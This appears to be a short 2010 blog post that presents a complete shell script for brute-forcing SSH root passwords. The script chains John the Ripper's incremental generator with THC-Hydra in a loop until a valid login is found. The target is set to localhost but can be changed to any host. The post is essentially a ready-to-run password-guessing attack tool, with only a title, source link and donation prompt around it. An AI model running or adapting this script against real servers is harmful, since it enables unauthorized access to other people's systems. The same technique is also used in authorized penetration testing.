THC-Hydra password bruteforcing with john the ripper - http://funoverip.net

#!/bin/sh

hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20   # time (seconds) to run john

tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"

if [ "$1" = "" ];then
    echo "Usage: $0 <john session file>"
    exit 0
fi

#for lfile in `ls $loginfiles*`;do

while [ 1 ];do
    # generate some password with john the ripper
    echo; echo "- Start (re)generating passwords with John"
    if [ -e "$john_sessionfile.rec" ];then
        # if session exist, restore it
        $john --restore=$john_sessionfile  > $tmp_passwd &
    else
        # if session not exist yet, create it
        $john $john_all_params --session=$john_sessionfile > $tmp_passwd &
    fi

    # wait 100 seconds, then kill john and start hydra on it
    echo "- Wait ..."
    sleep $john_time_step
    echo "- Kill john"
    killall john 2>/dev/null 1>/dev/null
    sleep 1

    # start hydra
    echo; echo "- Start hydra"; echo

    rm -f $hydra_logfile
    echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
    $hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile

    # if a valid pair has been found, stop the loop
    if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then
        echo; echo "FOUND !!"
        grep $hydra_module $hydra_logfile | grep -v DATA
        exit 0
    fi

done

Source: http://funoverip.net/2010/12/thc-hydra-password-bruteforcing-with-john-the-ripper/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00